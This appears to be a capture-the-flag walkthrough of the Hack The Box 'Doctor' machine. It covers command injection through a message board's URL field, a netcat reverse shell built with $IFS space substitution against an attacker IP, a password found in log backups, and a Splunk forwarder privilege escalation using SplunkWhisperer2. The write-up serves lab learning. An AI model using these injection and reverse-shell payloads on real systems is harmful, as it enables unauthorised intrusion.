Doctor HTB
Doctor Box walkthrough by fuxsocy

Nmap

As always we start by scanning for open ports using nmap. nmap 3 ports are available 22(ssh), 80(http), 8089(ssl/https).

80 http

Once I visit the ip on my browser I get a webpage.

webpage

The only information I get from this is a hostname doctors.htb from the send us a message section. I enter this on my hosts file.

Login_page_doctors

I have a login page, but also I have the functionality to register. After registering:

account_created_time_limit

My app does log me in automatically. Also there is a message which let’s me know that a time limit of twenty minutes for my account is in place. Using the New Message button we can send a message to something which looks like a board.

send_message

After providing a url as the Content to an url which is mine.

testmessage

gotrequestback

And I got a request back, which means we have something like a command injection. Let’s try to execute a wget command by using $(wget http://10.10.14.14) But I get link posted is not valid. link_not_valid Let’s try to execute a command using http://IP/$(id) so we get back the result of id as the requested file.

requested_back_id

Now I can execute commands inside $(). Let’s execute a reverse shell.

errorreverseshell

Nothing happend. I will try to add $IFS instead of spaces, but again it didn’t work, I had to find the nc binary inside the machine and then use single quote to get it work. This is the complete command: http://10.10.14.14/$(/usr/bin/nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.14'$IFS'7979')

shell

User

After the shell I try to look for passwords to escalate to another user, but after a little bit I found inside /var/log/apache2/ there is a backup file. I find a password inside of it.

password_found

I use it with shaun which gives me user.txt.

Root

Inside /opt/ folder I find splunkforwarder. Searching for this I find that this forwarder is used to collect data and then forward it to the splunk software, which seems to be something like a visualization software. Reading README-splunk.txt I get the version but didn’t manage to find an exploit for the exact version.I also find github repo https://github.com/cnotin/SplunkWhisperer2 which has a script to exploit this. I get the local exploit and upload it to the target machine. I get an error about not found modules, and I can’t installed them using pip. I try the remote exploit on my local machine. I create a file inside /tmp/ which includes a reverse shell and then execute the script. Also I listen on the specified port.

privesc

And I get root access.

root

The quieter you become, the more you are able to hear.
DHT4tMDxN34WgmtcX9em8AGMeqMpSechq4